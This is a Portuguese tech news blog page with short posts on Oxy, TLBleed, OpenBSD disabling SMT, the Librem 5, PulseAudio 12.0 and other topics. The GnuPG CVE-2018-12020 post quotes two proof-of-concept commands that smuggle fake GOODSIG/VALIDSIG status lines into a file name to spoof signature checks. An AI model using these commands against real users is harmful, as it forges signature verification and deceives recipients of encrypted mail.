Parece pretensioso(e é pretensioso) mas alguém na internet inventou uma nova ferramenta/protocolo que promete rivalizar o SSH(OpenSSH) em todos os seus aspectos chamado(a) Oxy. Até então o repositório do Github mostra apenas uma desenvolvedora de login jennamagius, então provavelmente a autoria das alegações de superioridade na página do Oxy são dela. Dentre elas estão:

  • Memory Safe + Rápido:
    • Escrito em Rust, garantindo proteções que o C não dá
    • Não possui problemas de corrupção de memória oriundos da arquitetura do C
    • Regressões acontecem a todo o momento no OpenSSH por conta da sua linguagem de programação
  • Criptografia Moderna:
    • AES-256-GCM + Ed25519 baseada no Ring+BoringSSL
    • Não inclusão de algoritmos de criptografia "defasados" já que o software é novo.
    • Perfect-forward secrecy sempre habilitada
    • Quantum-resistente por usar PSK estática em conjunção com criptografia assimétrica
  • Segurança paranoica:
    • Oxy roda como serviço oculto - Se você não está autorizado a usar, nem sabe que ele existe
    • Baixa área de contato já que a primeira operação remota é um memcpm() contra um hash calculado independentemente
    • Sem serialização/deserialização até que o processo de autenticação seja concluído
  • Segurança contra a psicologia do usuário:
    • Olhe a imagem abaixo:
    • Todo usuário está "fadado" a sempre digitar enter e em algum momento cair em uma armadilha
  •  Notar que com o OpenSSH a usabilidade ficou afetada:
    • Estando conectado em um host, seria bastante prático apenas... baixar um arquivo?
    • Porque o ssh não aceita o -r após argumentos posicionais? Porque o parâmetro "porta" é diferentão e usa letra maiúscula?
    • Porque há softwares distintos como sftp e scp?
    • Se o seu argumento é "por razões históricas" imagine uma conversa onde o pai fala "Porque seu quarto é bagunçado, menino?" e o rapaz responde "Por razões históricas pai."
    • Se algo precisa ser quebrado pra ser melhorado, assim deve ser
    • O desenvolvedor ainda sim possui grande admiração pelo OpenSSH, mas acha que ficou para trás em alguns aspectos

Além destes tópicos a página do Oxy discorre sobre outros aspectos onde ele rivaliza e é até melhor tecnicamente que o ssh como possuir compressão por padrão, e a não necessidade de depender de outros softwares rodando daemon como rsync em transferências de arquivo.

Se o software é tudo isto eu não sei, mas é bom manter ele na lista de programas que podem num futuro ser adotados em larga escala. Mais detalhes sobre o protocolo: protocol.txt

Fonte: Oxy-Secure.app

 

Add a comment

O conglomerado chinês Tecent Holding, que comercializa diversos serviços/produtos para a internet ingressou na Linux Foundation como membro platinum. Durante os eventos da Linux Foundation que estão ocorrendo em Bejing, ela e a Tecent anunciaram a parceria.

A empresa também concordou em tornar opensource seus projetos TARS e TSeer para a Linux Foundation. TARS é um framework RPC e TSeer é um framework de descoberta de serviços de alta-disponibilidade.

Maiores detalhes no site da Linux Foundation.

Fonte: Phoronix

Add a comment

Sem muito alarde a versão 12.0 do PulseAudio foi lançada ontem, este conhecido (e polêmico) software servidor de som open-source.

Dentre as melhorias estão melhores relatórios de latência em perfis Bluetooth A2DP e Apple AirPlay, dispositivos HDMI possuem maior prioridade que saídas SPDIF, suporte para o headset USB Artics 7 da SteelSeries, suporte a caixa de som Dell Thunderbold Dock TB16, corrigido o suporte a entrada digital em placas de som USB, novo cancelador de eco Speex, bindings Vala e uma série de outras melhorias.

Maiores detalhes sobre o PulseAudio 12.0 disponíveis no site do projeto FreeDesktop.org.

Fonte: Phoronix

Add a comment

Vem a tona as primeiras evidências daquilo que o pessoal do OpenBSD já estava prevenindo/prevendo: SMT(Intel HT) é perigoso e gera novos vetores de ataque.

Com mais um daqueles nomes "moderninhos" para exploits, o TLBleed é um ataque side-channel que vaza informações de TLBs. O TLBleed se mostrou confiável sem depender de caches de dados ou instruções tentando trespassar as diversas proteções propostas para os caches de CPU em ataques side-channel. De acordo com Ben Gras, palestrante do evento citado na fonte desta postagem, o TLBleed conseguiu vazar uma chave EdDSA de 256-bit da libgcrypt (usada na GPG por exemplo) com 98% de chance de sucesso após uma única observação do processo de assinatura feito em um corresidente do HyperThread em apenas 17 segundos de análise.

Com o TLBleed também é possível vazar uma chave RSA da libgcrypt utilizando uma tecnologia que envolve machine learning, e esta técnica junto com as falhas que o SMT pode ter aumentará bastante a sofisticação de ataques side-channel no futuro. Nesta apresentação, serão exibidos detalhes da arquitetura, comportamento de TLBs modernas multinível e diversos outros aspectos da microarquitetura da Intel que não são documentados e estarão publicamente disponíveis a partir desta apresentação.

Fonte: Black Hat USA 2018 - TLBleed: When Protecting Your CPU Caches is Not Enough

Add a comment

O OpenBSD está desabilitando o SMT (Simultanious Multi Threading) em instalações padrão, item nos processadores mais conhecido pelo nome comercial da Intel, o HT (Hyper Threading).

Tal solução foi proposta para mitigar futuros ataques similares ao Spectre, já que todas as implementações SMT compartilham a TLB e caches L1 entre as threads. Note que apesar de estar desabilitado nas próximas versões do SO a funcionalidade pode ser trazida ao ar novamente apenas manipulando o parâmetro de kernel hw.smt com o utilitário sysctl.

O impacto de peformance não deverá ser grande, já que isto depende do quão integrada a aplicação é com tecnologias SMT e o load efetivo do equipamento.

Até agora apenas a arquitetura arm64 em processadores Intel será afetada com esta alteração, mas o time do OpenBSD pretende estender esta proteção para outras arquiteturas e fabricantes de hardware.

Fonte: Phoronix

Commit: CVS: cvs.openbsd.org: src

Add a comment

Não conseguindo entregar um telefone 100% Software Livre / Sistema Libre, o smartphone Librem 5 terá um processador secundário para lidar com os blobs binários necessários para a inicialização e para mantê-los longe do bootloader u-Boot e do kernel Linux.

O problema aqui é que para tornar o Librem 5 tão aberto quanto possível alguma atitude precisava ser tomada com as firmwares necessárias para o processo de treinamento da DDR4. Não sendo muito realista a possibilidade da reescrita de firmwares para o DDR4 PHY training, a Purism está planejando o armazenamento destes blobs binários em um processador secundário. Desta forma, eles podem aplicar esta exclusão com a Free Software Foundation enquanto ainda conseguem o selo "Respects Your Freedom" tendo os blobs necessários para o funcionamento.

O SoC i.MX8 tem uma CPU com núcleos Cortex-A53 e um núcleo ARM M4. Enquanto os núcleos do A53 estão envolvidos com o Linux e u-Boot no processo de inicialização o M4 faz a parte do treinamento de memória. Desta forma, o processador A53 permanece "limpo" para os padrões da FSF.

Maiores detalhes sobre o Librem 5 e como eles estão lidando com as firmwares proprietárias no blog Purism.

Fonte: Phoronix

Add a comment

Ben Widawsky, um dos arquitetos de drivers gráficos Linux designado pela Intel e que está a 8 anos no cargo, irá cumprir tarefas com foco no aprimoramento do FreeBSD. Ben continua na Intel mas se afasta do time gráfico Linux para focar no desenvolvimento do FreeBSD. As contribuições de Ben não se limitarão a parte gráfica, e o desenvolvedor estava até buscando freedback de usuários/desenvolvedores para focar as melhorias nas áreas onde o FreeBSD ainda não está maduro o suficiente(segundo seus próprios usuários).

Duas semanas após a primeira postagem no blog de Ben Widawsky, uma segunda postagem foi feita explicando que este time com foco em FreeBSD é novo na Intel e compartilhou as ideias que coletou sobre melhoria.

Dentre os itens priorizados estão suporte a rede Intel 100GbE, melhorias de escalabilidade na NUMA, drivers de vídeo nativos para o FreeBSD(ao invés de drivers DRM portados do Linux), suporte 3D Xpoint, melhorias no gerenciamento de energia, melhorias gerais de segurança/estabilidade, suporte ao pass-through gráfico no FreeBSD, tempo de boot mais rápido, wireless Intel 802.11AC e mais.

Fonte 1: Phoronix

Fonte 2: Phoronix

Add a comment

Seguindo o fiasco da vulnerabilidade EFAIL que envolve formatação HTML em emails para sequestro de dados, temos o CVE-2018-12020.

De acordo com o CVE, o arquivo mainproc.c do GnuPG antes da versão 2.2.8 não trata corretamente o nome do arquivo durante o processo de criptografia e verificação, permitindo que o atacante insira a saída ao GnuPG através do filedescriptor 2 usando o --status-fd 2 . Uma sequência OpenPGP que represente o arquivo original em conjunção com as ações(códigos de status) GOODSIG e VALIDSIG são o suficiente para gerar um ataque válido. O problema foi corrigido nas versões GnuPG 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, e python GnuPG 0.4.3 e a atualização destes softwares é recomendada. Também é uma boa pratica desabilitar o verbose no arquivo de configuração gpg.conf.

POCs:

1

$ echo 'Please send me one of those expensive washing machines.' \
| gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

2

echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

Fonte 1: ArsTechnica

Fonte 2: CVE-2018-12020

Add a comment

Diversas empresas estão criando produtos compatíveis com o selo Respects Your Freedom da Free Software Foundation. De uma forma bem simplificada, isto garante que o seu equipamento não te espiona executando tarefas que você não tenha autorizado. Infelizmente os computadores que atendem a estes requisitos possuem um hardware um pouco antigo, e no plano cartesiano das escolhas o usuário precisa abrir mão de performance para ter mais privacidade.

O hacker e amante de liberdade SolidHal está em uma jornada para criar um laptop que atinja os requisitos da FSF para o Respects Your Freedom, dando mais opções para estes usuários. Em seu trabalho ele faz com que o Chromebook Asus C201 marque todos os pontos necessários, instalando o LibreBoot e se livrando de todos os resquícios do Intel Management Engine. Contudo, havia um problema: A WiFi permantente do equipamento precisa de firmware proprietária. Para remediar a situação ele resolveu instalar internamente um adaptador de redes sem fio USB que possui o selo de aprovação da FSF.

Obviamente este equipamento não possuía uma porta USB interna mas SolidHal estudou um pouco e "sacrificou" a conexão da Webcam e após notar como o pinout funcionava,e converteu os fios em uma porta USB usando um pouco de solda. Como o adaptador wifi usb é bastante enxuto, pode ser posicionado nos espaços vagos que a carcaça do notebook possui. Sabemos que este tipo de setup pode gerar ruídos na antena(barreiras físicas e enclausuras de metal), mas são todos preços que os que desejam um hardware livre estão aptos a pagar.

Fonte: HackADay

Fonte da Fonte: Add a usb wifi dongle without losing a usb port (ath9k_htc)

Add a comment